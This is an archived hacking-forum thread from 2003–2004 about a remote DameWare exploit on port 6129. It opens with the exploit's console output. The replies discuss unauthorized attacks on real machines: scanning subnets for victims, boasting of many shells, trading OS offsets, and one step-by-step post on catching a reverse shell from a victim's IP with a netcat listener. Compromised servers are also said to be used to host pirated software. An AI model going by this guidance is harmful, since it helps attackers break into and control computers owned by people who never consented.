[*] Initializing sockets... [ OK ] [*] Binding to local port: 12... [ OK ] [*] Setting up a listener... [ OK ]
OS Info : WINNT4 SP String : Service Pack 6
EIP: 0x77f32836 (kernel32.dll)
[*] Constructing packet for WIN NT4 SP: 6... [ OK ] [*] Connecting to xx.xxx.xx.xx:6129... [ OK ] [*] Packet injected! [*] Waiting for incoming connection... [x] Exploit appears to have failed!
Axl
Dec 20 2003, 08:50 PM
QUOTE (X-FloppY @ Dec 20 2003, 01:06 AM)
Can someone explain to me how to use this exploit? isaiah shutup, that was mean.
Scan for port 6129 and use the exploit
Axl
Dec 20 2003, 08:52 PM
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isnt a remote exploit... dont forget this ^^
er... yes it is.
Diablotic
Dec 20 2003, 09:02 PM
QUOTE (QuantumTopology @ Dec 20 2003, 08:52 PM)
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isnt a remote exploit... dont forget this ^^
er... yes it is.
Er... it isnt I mean you need to have external (exteriar?) IP. For instance i haven't so i cant use this exploit am i right? Well maybe I can but only from another comp with remote desktop.Am I right?
Axl
Dec 20 2003, 09:19 PM
QUOTE (Diablotic @ Dec 20 2003, 09:02 PM)
QUOTE (QuantumTopology @ Dec 20 2003, 08:52 PM)
QUOTE (TeCH-NiNE @ Dec 20 2003, 02:36 AM)
afaik... this one isnt a remote exploit... dont forget this ^^
er... yes it is.
Er... it isnt I mean you need to have external (exteriar?) IP. For instance i haven't so i cant use this exploit am i right? Well maybe I can but only from another comp with remote desktop.Am I right?
dude you aren't exploiting yourself.
Quasimod
Dec 20 2003, 09:39 PM
Howto check if the listing port 6129 is version 3.72.0.0 ?
polax
Jan 10 2004, 01:53 AM
good taff its merite reflexion
XtrA
Jan 10 2004, 09:30 AM
isn't that dwmrc.exe good than it?
eagle123
Jan 16 2004, 01:01 PM
hi! how i have to compile it?
if y try to compile with C in dos i get 10 errors.
Yellow_Blue
Jan 17 2004, 06:48 AM
nice exploit BUt, i have already Auto hax0r for it ;p
DrDoc
Jan 18 2004, 07:46 AM
LOL nice replys yellow_blue in every Threat
rofl
Cya Doc
TheOther
Jan 20 2004, 10:53 AM
Yellow Blue,
Could you share this auto-haxor with us?
Thx
sybexs
Jan 21 2004, 04:57 AM
i still have yet to find an ip with this exploit. im just about to give up on it. and plus since its a rareity i doubt finding it will be easy.
Dalrok
Jan 21 2004, 11:44 AM
nice try
Train25
Jan 22 2004, 02:56 AM
ive found quite a few shells but have noticed 2 configs it will not spawn a shell. Everyone I tried with these configs never spawn a shell. They are: WIN2000 [ver 5.0.2195] Service Pack 4 WINNT4 Service Pack 6
Did anyone manage to find good offsets for these 2 OSs. If so please post the offsets here.
Thanxs in advance
AsuKa
Feb 4 2004, 02:04 PM
I know this is kind of old, but I have a prog. that filters out all of the bad/false ip's from your logs, if anyone wants I would be glad to send it to them, cant attach becuase Im still a trial member.
net_runner
Feb 4 2004, 02:51 PM
...and i will try it, the replys are good recomendations
Steffan
Feb 4 2004, 04:12 PM
QUOTE (Train25 @ Jan 22 2004, 02:56 AM)
WIN2000 [ver 5.0.2195] Service Pack 4 WINNT4 Service Pack 6
Did anyone manage to find good offsets for these 2 OSs. If so please post the offsets here.
W2K SP4 works allways.... with the moded exploit-....
I'll post the Offsets here when I get back home
C'ya Steven
n4than_69
Feb 4 2004, 04:14 PM
QUOTE (Train25 @ Jan 22 2004, 02:56 AM)
ive found quite a few shells but have noticed 2 configs it will not spawn a shell. Everyone I tried with these configs never spawn a shell. They are: WIN2000 [ver 5.0.2195] Service Pack 4 WINNT4 Service Pack 6
Did anyone manage to find good offsets for these 2 OSs. If so please post the offsets here.
Thanxs in advance
how about WinXP [ver 5.1.2600] ?
Steffan
Feb 5 2004, 06:56 AM
QUOTE (n4than_69 @ Feb 4 2004, 04:14 PM)
how about WinXP [ver 5.1.2600] ?
Same it works and most U get a shell...
I'll upload my own coded exploit so U guyz can get a shell
C'ya Steven
Krogoth
Feb 6 2004, 08:08 AM
okay, i've tried this tool and can't get a shell from WIN2000 [ver 5.0.2195] Service Pack 4. well, it works sometimes for WinXP [ver 5.1.2600]. so far not bad at all for the tool but there's little hope as most dameware has been patched up.
that's nice of you Steffan. your help is greatly appreciated.
AsuKa
Feb 6 2004, 08:32 AM
Krogoth, I have gotten a shell from WIN2000 [ver 5.0.2195] Service Pack 4, maybe server is behind a firewall? Even though this is old, and servers are being patched up, I still get a multiple shells a day just scanning entire subnets. The filter really helps out with the checking since it elimates most of the duds. Although I dont support fxpboards and setting up stro's for warez, I like to look around, and the remove then remote control service when done
Fooldj
Feb 7 2004, 03:29 AM
i heard there were 2 versions of this..one by crylor and one by adik..and that one was buggy but the other was fine..anyone know anything about this?
Lusty
Feb 10 2004, 02:39 PM
Nice exploid man... Thanks a lot.. nice that it isn't nessesary to use nc.exe to listend on the ports like if you use dameweird.
forza
Feb 12 2004, 11:40 PM
it works well in the lab... but how can i see that the remote dameware is 3.72?
Knutinho
Feb 13 2004, 06:03 AM
@ forza,
one thing u can do, is to check your ips, where port 6127 is open. But i don't know any tool, which displays the versin of the dameware programm running on the other system.
mathofaka
Feb 13 2004, 06:42 PM
nice nice nice exploit i gat like ten shells
for thoses who dont know how to use it .. this is how i doit
i open to shells
i goto were the exploit is at then i use netcat nc -L -vv -p (any port) like 131 it has to be three numbers it should say netcat lising in port (wat ever u put)
in the other shell u go to were the exploit is at (again) then i type in dameware (the ip of the victim the ure ip) then the port the u put 131
then wait if it says patched then 4 get that person
exposure
Feb 28 2004, 02:55 AM
Hello everybody."
sorry for bad englisch
I'll have the problem when i'll starting nc.bat (netCad) and i'll run the autohacker option 2 type scan.txt of whatver enter. Than make a connection to the port 444 conecting good is on the screen done but cathering information i'll get a hangup from the autohacker tool I'm not use a firewall. So i'll get no shell's on the dos prompt never Can anybody help me please what i can do to this problem.?
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
